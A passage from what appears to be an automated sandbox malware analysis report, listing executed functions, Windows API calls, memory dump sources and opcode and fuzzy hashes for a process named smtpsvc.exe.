Function 002AA5C6, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 002AA63A

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 2324b417f530ef996a935f78ffade6e25f8f3aef49bfbdadecf606f0e9c973c0
Instruction ID: c2f9258814661642077d36fd3b0b5e122b7d9c7777eb0de794e5a67d975f4375
Opcode Fuzzy Hash: 2324b417f530ef996a935f78ffade6e25f8f3aef49bfbdadecf606f0e9c973c0
Instruction Fuzzy Hash: A8110171504340AFE310CB15DC42F76BFF8EF85A20F0885AAED489B642D275B925CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 002AA1F4, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32 ref: 002AA269

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: b4fa72d696a212064e710d63bada2f73cdeb74915f56fd8bfcbd7a722373ad65
Instruction ID: 19004e6b5973b066af8a11b2f92719ccfd7a94be1263c02fe930b5fcb4a31b84
Opcode Fuzzy Hash: b4fa72d696a212064e710d63bada2f73cdeb74915f56fd8bfcbd7a722373ad65
Instruction Fuzzy Hash: 9E214A7140E7C09FD7138B659895692BFB4EF03320F0A81DBD9848F1A3D369A919CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002AA4DE, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E40,9CCAA513,00000000,00000000,00000000,00000000), ref: 002AA53D

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3e5c430008f96803349decbcdb2ec417d12f21b5ecf9612ea7fc83fc9f668e86
Instruction ID: 4559ec19d7b024641664a829856315b6195bc828ce28ca5434e3f4480d769787
Opcode Fuzzy Hash: 3e5c430008f96803349decbcdb2ec417d12f21b5ecf9612ea7fc83fc9f668e86
Instruction Fuzzy Hash: 7711C172800300EFFB21CF55DC44F6AFBA8EF44320F1485AAE9499A141C675E954DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 002AA2A3, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 002AA2FC

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: f5a733fbc70fb0334fc716be11a737550e034cfb70ad11ce8d42dbf6532a4309
Instruction ID: fc5d1c42e15b9f48a011089512bab90ada3b41d9815cd3d4a3a7f7d81a4b5713
Opcode Fuzzy Hash: f5a733fbc70fb0334fc716be11a737550e034cfb70ad11ce8d42dbf6532a4309
Instruction Fuzzy Hash: 1011A0715097C09FDB128B25DC45B66FFB4EF07320F0984DAED858B263C275A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002AA5EA, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 002AA63A

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 7d294ce5e0322e769493adf1662cce02364b92e9ea2b13937c6fcb292dc2300a
Instruction ID: a84416d261f94fd999567e8e744e54da00f983e70ca9a81a1d532da8ba08ca6f
Opcode Fuzzy Hash: 7d294ce5e0322e769493adf1662cce02364b92e9ea2b13937c6fcb292dc2300a
Instruction Fuzzy Hash: 4A017171900601AFE310DF16DD45B26FBA8FB84A20F14856AED089B741D275F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 002AA2CA, Relevance: 1.5, APIs: 1, Instructions: 39
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 002AA2FC

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: cf44a66cd882520a407d3ddb23427ab08d7baae1f5f5f27eed46972bd16130b5
Instruction ID: 450dbfadd4a9f5d1b9de72b644c14ab422a8bffb68ef1b76dd41c13dd6d6e126
Opcode Fuzzy Hash: cf44a66cd882520a407d3ddb23427ab08d7baae1f5f5f27eed46972bd16130b5
Instruction Fuzzy Hash: 4901D1355103408FEB108F15E889769FB90EF01320F08C0EADD098B652D7B5A968CA62

Uniqueness

Uniqueness Score: -1.00%

Function 002AA23A, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32 ref: 002AA269

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 88f1b6f2fe8e79116c8f3bf4267d2b55853fac7f99baedf3ece327e36c412b68
Instruction ID: 5157dafbe44eae3103731ec7e3b2f79bb3240f073af4a926762345c6f903ac72
Opcode Fuzzy Hash: 88f1b6f2fe8e79116c8f3bf4267d2b55853fac7f99baedf3ece327e36c412b68
Instruction Fuzzy Hash: 5CF0CD31914740CFEB20CF09D889761FBA0EF05720F08C0EADD094B302D7BAA964CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00401150, Relevance: 1.5, Strings: 1, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 00401386

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: f11ffca08641c09ac62b1b6082eb720183279da1ec81029faff27707a36c559f
Instruction ID: 067c364fdfd7ece7000de172a4a1e44ea5f65a62414126f76d0963a53731dcab
Opcode Fuzzy Hash: f11ffca08641c09ac62b1b6082eb720183279da1ec81029faff27707a36c559f
Instruction Fuzzy Hash: F2814D74B006018FEF18AB69C454B6EB7E7AFC8304F18446AE409AB7A5CE389C45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00401140, Relevance: 1.4, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 00401386

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 3d7e112f5efee717856e5dca9c85bffca223169781db44f2a6f71efcbcdac126
Instruction ID: eba662c7fb5bcf150ccac33a624a88d45a878ec4c6a86c6fe082bd2a2dffe281
Opcode Fuzzy Hash: 3d7e112f5efee717856e5dca9c85bffca223169781db44f2a6f71efcbcdac126
Instruction Fuzzy Hash: DD615E34B006018FEF14AB69C454B6FB7F6AF84304F29406AE505EB7E5DA38DC45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004006B9, Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D9Vq, xrefs: 00400796

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 811b981f1f85ebe747c451f307f14f747bdfa78c08bd783977769dae36f4f452
Instruction ID: 65a462f2c610bba00fb0ec66ee3843d8c73bf7b74cbde0ba415d3560efd54335
Opcode Fuzzy Hash: 811b981f1f85ebe747c451f307f14f747bdfa78c08bd783977769dae36f4f452
Instruction Fuzzy Hash: DD314F347012128FDB196B78C02876D37E2AFD6305B1514BED406CF7A2EE39CC469B81

Uniqueness

Uniqueness Score: -1.00%

Function 004006C8, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

D9Vq, xrefs: 00400796

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 27a46ed26df701b97df0b20cdf8841594ce181358e49dc494aeed2349a53d15e
Instruction ID: df57ae1e202bbbaf5539e7f3bbaf90b2d66650895a56712570a5f56ad441e260
Opcode Fuzzy Hash: 27a46ed26df701b97df0b20cdf8841594ce181358e49dc494aeed2349a53d15e
Instruction Fuzzy Hash: C52132303012128FDB5D6B78C02876D36E2AFD5715B1404BED40ADF7A5DE3ADC469B81

Uniqueness

Uniqueness Score: -1.00%

Function 002AA336, Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 002AA39C

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 23afa337cff15dcf536c1f25a3de2baa88b0cedf68ce963584945ab5440a02a2
Instruction ID: 8a6386f06dcf1766654474e9778da6283f00f9bc6b143e905edfd18249805bf5
Opcode Fuzzy Hash: 23afa337cff15dcf536c1f25a3de2baa88b0cedf68ce963584945ab5440a02a2
Instruction Fuzzy Hash: 52215C755093C09FD7128B25DC55A56BFB4EF02220F0984EBE9858B163C279A958CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002AA36A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 002AA39C

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3ed2a27013625b19cfc9cf3511eb0fd309db5bbb5e9ac30270219657b971c0db
Instruction ID: 6fd5b3d33e7fb0a14fd9dec40297e597c6e6b20975a96d35e0a49fb39bfedabe
Opcode Fuzzy Hash: 3ed2a27013625b19cfc9cf3511eb0fd309db5bbb5e9ac30270219657b971c0db
Instruction Fuzzy Hash: 75018F75515340DFEB208F25D889769FB94EF01320F08C4EADD098B642D7B5E954DA62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0861, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.439096659.0000000000BB0000.00000040.00000040.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_bb0000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b912b7248b7bcb880cb25b8c03528f1745dd28ea250b26fb62fad42048b507
Instruction ID: c941561d6b79ac4ca3048ae94bb58595ac65e0653d4e46313db9680381b980e3
Opcode Fuzzy Hash: 53b912b7248b7bcb880cb25b8c03528f1745dd28ea250b26fb62fad42048b507
Instruction Fuzzy Hash: 15F0F9725197404FD315AB15EC114B2BBE4EF45330B08C0FBD809CB213E169AA04CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB07F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.439096659.0000000000BB0000.00000040.00000040.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_bb0000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 420eddfa13346fcd730554a8ab3481620a2cc6aa2f1f67f8e92a145bda81d870
Instruction ID: a7717406a4a32864f5e6278f57c31480428682fe90d4f5fb3eef4f8dd69cad26
Opcode Fuzzy Hash: 420eddfa13346fcd730554a8ab3481620a2cc6aa2f1f67f8e92a145bda81d870
Instruction Fuzzy Hash: DEF0A9B65097806FD7118B05EC41863FFA8DA86630B09C4AFFC498B612D125B909CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00401040, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7426a8c38530f61353fa7b69396be4895158bfb02fb00cf0d0c10a8061f69f
Instruction ID: 0e326f62afe2937d7629896a33247c7209466cfa8f9d4354921be5a1ead79f94
Opcode Fuzzy Hash: 8d7426a8c38530f61353fa7b69396be4895158bfb02fb00cf0d0c10a8061f69f
Instruction Fuzzy Hash: 05F024323001109BD71496BA9C00F6733C9EBC8B20F104036F209DB290CE71DC418394

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d75d1ffa95b4d92cf16663c00d7736702e26b5f9224897bf2587c9edbfac121
Instruction ID: 4f1910fc5dcce033ca4b2ae4b3ad96e07427e9a0fc2fb26aea415bc8ca9127d8
Opcode Fuzzy Hash: 8d75d1ffa95b4d92cf16663c00d7736702e26b5f9224897bf2587c9edbfac121
Instruction Fuzzy Hash: F9F024303043816FD31696754C11F233BD9ABC6B50F1544ABE245EF2E2DDB5EC4183A4

Uniqueness

Uniqueness Score: -1.00%

Function 00400EF0, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db88fff6e663755b5993af00c4a440bdc7ec882bc3ac2ff1732ac8d39d90d3e5
Instruction ID: b947769f7105829491ec48414e049b9edace479aa8d9ed0d9c0c05a5c931b05c
Opcode Fuzzy Hash: db88fff6e663755b5993af00c4a440bdc7ec882bc3ac2ff1732ac8d39d90d3e5
Instruction Fuzzy Hash: 65F027342001008FC714EF78D808E4637DAAF8A318F1140A7D408CB375DAB0AC4ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 00BB081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.439096659.0000000000BB0000.00000040.00000040.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_bb0000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b906be798c1583196cb84c780f59c038634237e79de25f7b3b92352f11c2c29a
Instruction ID: 9ff3930775defb4a1cee5b81ce26d811c34b9eb10221ffdcd6b658d060a3dd58
Opcode Fuzzy Hash: b906be798c1583196cb84c780f59c038634237e79de25f7b3b92352f11c2c29a
Instruction Fuzzy Hash: 2BE092766017008BD650CF0AFC41462F7D4EB84A30B08C07FDC0D8B701D13AB605CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00400F00, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b738189e4359dee6212e9ec054cc4da053564709ca28ade2318b589248f231
Instruction ID: 0af95333817a04f60f1016254d3b1be93e076581052c6d98385e772c7a9dbb6a
Opcode Fuzzy Hash: 54b738189e4359dee6212e9ec054cc4da053564709ca28ade2318b589248f231
Instruction Fuzzy Hash: 0CE09A343104108FCB14EBB8E448D5A33EAAB89369B1044BBE409D7338DEB0AC4ACBC1

Uniqueness

Uniqueness Score: -1.00%

Function 004000A8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13347f1158b12fb7c6a381a0193648cb1819cda2f32e6c5894c498aaae83fec2
Instruction ID: f63101e1f5c7622c41680d067c7873d1033f75e3d83036f75db66c2cb0ce6456
Opcode Fuzzy Hash: 13347f1158b12fb7c6a381a0193648cb1819cda2f32e6c5894c498aaae83fec2
Instruction Fuzzy Hash: C7E07575D0121D9F8F40EFB999455DEBFF8EA49254F200466D509F3200E23556118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004010B0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06434e84e5cdd5626f6971560c83bf01620cd99005a5a1fad1a445dba6cceb81
Instruction ID: b713d1e937d1fa811bc959a596f7daebe48963996923f04a684d1d98756394e8
Opcode Fuzzy Hash: 06434e84e5cdd5626f6971560c83bf01620cd99005a5a1fad1a445dba6cceb81
Instruction Fuzzy Hash: 2AE0B6B1E012099ECB80EFBA98456DFBFF8EB48250F504577D108E3200E23592558BE2

Uniqueness

Uniqueness Score: -1.00%

Function 002A23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437588242.00000000002A2000.00000040.00000001.sdmp, Offset: 002A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a2000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572b642f708d02ce52a367a42cbf0e7816215584cc908e2642434de074969dcd
Instruction ID: f98d9db0e8c2906da1b8a70d3f336e7c3000b1fd9b2468eaff30711b0b5adf7e
Opcode Fuzzy Hash: 572b642f708d02ce52a367a42cbf0e7816215584cc908e2642434de074969dcd
Instruction Fuzzy Hash: 07D05E79214A928FD3168F1CC1A4B9537D4AB56B04F4644F9A800DB6A3C768D999D200

Uniqueness

Uniqueness Score: -1.00%

Function 002A23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.437588242.00000000002A2000.00000040.00000001.sdmp, Offset: 002A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a2000_smtpsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e23853902175e57ca0448a6eb287185ed1351c990ee45a70ddd8212daf86ae
Instruction ID: f9d32771289e30275fea6e3383cace1b95c71aec4feab00ef4ab7fa90928bbb8
Opcode Fuzzy Hash: c6e23853902175e57ca0448a6eb287185ed1351c990ee45a70ddd8212daf86ae
Instruction Fuzzy Hash: C0D05E343106828BDB19CF0CC294F5973E4AB42700F0644E8BC108B266C7B8DC94DA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: smtpsvc.exe PID: 2664 Parent PID: 1764 smtpsvc.exeCOMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	48
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0016A4AA, Relevance: 1.6, APIs: 1, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E40,99B43983,00000000,00000000,00000000,00000000), ref: 0016A53D

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 62115f99948cc325b1d31943d2c91898979426cf68cb43508030ef30d6ba7f30
Instruction ID: b9a0b32eb48479ce34f8790d9d36006d9dfd72c1a9719b4df5a2daccdb5f2a90
Opcode Fuzzy Hash: 62115f99948cc325b1d31943d2c91898979426cf68cb43508030ef30d6ba7f30
Instruction Fuzzy Hash: 9A21A671409380AFE7128B55DC44F96BFB8EF46310F0885DBE9859B193C225A909DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0016A1F4, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32 ref: 0016A269

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 5ec03392d27741f687fc76c846aaeec22377e84fba311a08f2568bcdfabea862
Instruction ID: 9698111487c01c6dc5d0d202c23e486860732bdd3258391d22614677b8e91b51
Opcode Fuzzy Hash: 5ec03392d27741f687fc76c846aaeec22377e84fba311a08f2568bcdfabea862
Instruction Fuzzy Hash: D7218C3144E7C09FD7138B259C95692BFB0EF03220F0A81DBD9848F1A3D369A919DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0016A4DE, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E40,99B43983,00000000,00000000,00000000,00000000), ref: 0016A53D

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 704cf9ba7279e86cdae3caca6a4a1d7f247c63b5d50277da863cbcc73291562e
Instruction ID: be190c4ab50352d32c394238be2f8396e8a4ccf579df6f2e846354900e08880c
Opcode Fuzzy Hash: 704cf9ba7279e86cdae3caca6a4a1d7f247c63b5d50277da863cbcc73291562e
Instruction Fuzzy Hash: 0211E372400300EFFB21CF55DC84F6AFBA8EF44320F1485AAE94A9A141D374E954DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0016A2A3, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0016A2FC

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: b4e05d44c589b6be5a77ddf6cffbbd466d05059d6e24c1e31ad03a5d0cca107b
Instruction ID: 7b6b19fdc73f34abd446785932c4ed7595193a0836a2811603dc44c6963c106e
Opcode Fuzzy Hash: b4e05d44c589b6be5a77ddf6cffbbd466d05059d6e24c1e31ad03a5d0cca107b
Instruction Fuzzy Hash: 9A11A0755093C09FDB128B25DC85A56FFB4EF06220F0984DAED858B263C275A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0016A2CA, Relevance: 1.5, APIs: 1, Instructions: 39
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0016A2FC

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 2bda0e7386fa04020a8e4e2210667f28ee9cc7fcfa6154310c7a0d1d76288694
Instruction ID: e1e5a40a30d255c9285cdcb3831be8b2572589e107e9a99b694ab1312a584c4c
Opcode Fuzzy Hash: 2bda0e7386fa04020a8e4e2210667f28ee9cc7fcfa6154310c7a0d1d76288694
Instruction Fuzzy Hash: F701F4355403408FEB108F19EC89769FB94EF00320F48C0AADD0A9B752D375E954DE62

Uniqueness

Uniqueness Score: -1.00%

Function 0016A23A, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32 ref: 0016A269

Memory Dump Source

Source File: 00000012.00000002.452200070.000000000016A000.00000040.00000001.sdmp, Offset: 0016A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_16a000_smtpsvc.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 9c6dffe81f1e67476ba828e8e13def03d050c6393731c9e74c983518dd813835
Instruction ID: 26743e22136fcf603d4d0eb2a0c4d8bcb8ddb0f45c62a8b17af71d018896bf05
Opcode Fuzzy Hash: 9c6dffe81f1e67476ba828e8e13def03d050c6393731c9e74c983518dd813835
Instruction Fuzzy Hash: E1F0A9359443408FEB108F06D889765FBA0EF00720F48C0AADD494B202D3BAA958DEA2

Uniqueness

Uniqueness Score: -1.00%

Function 002400E8, Relevance: 1.4, Strings: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 0024029B

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: eefb13d6c5015b06cbdc71e77f9cfa41101c99facb7b0a229c11a841504279d2
Instruction ID: 9e3130010199e4927687387570b90e7ae8254652e9199d7b10e7578ddb5d9be2
Opcode Fuzzy Hash: eefb13d6c5015b06cbdc71e77f9cfa41101c99facb7b0a229c11a841504279d2
Instruction Fuzzy Hash: AC716D30A102118FD71DEF68D498B6D7BF3BB88340F158068E90A9B7A5DBB59DC5DB80

Uniqueness

Uniqueness Score: -1.00%

Function 002406B9, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D9Vq, xrefs: 00240796

Memory Dump Source

Source File: 00000012.00000002.452345780.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_240000_smtpsvc.jbxd

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 9132be5fb28f8d0d7071f245fea37ba0d0baf504bbadcf721932b03235fe7c0a
Instruction ID: 57668ee2c1b376f1c2cb056f38caf6e6915a24f6ace69757408c22100feb82ce
Opcode Fuzzy Hash: 9132be5fb28f8d0d7071f245fea37ba0d0baf504bbadcf721932b03235fe7c0a
Instruction Fuzzy Hash: E6314F343052528FDB1E6B78D468A6D36E2AFD5311B1404BDD40ADF7A2DE3ACC86C751

Uniqueness

Uniqueness Score: -1.00%

Function 002406C8, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D9Vq, xrefs: 00240796

Memory Dump Source

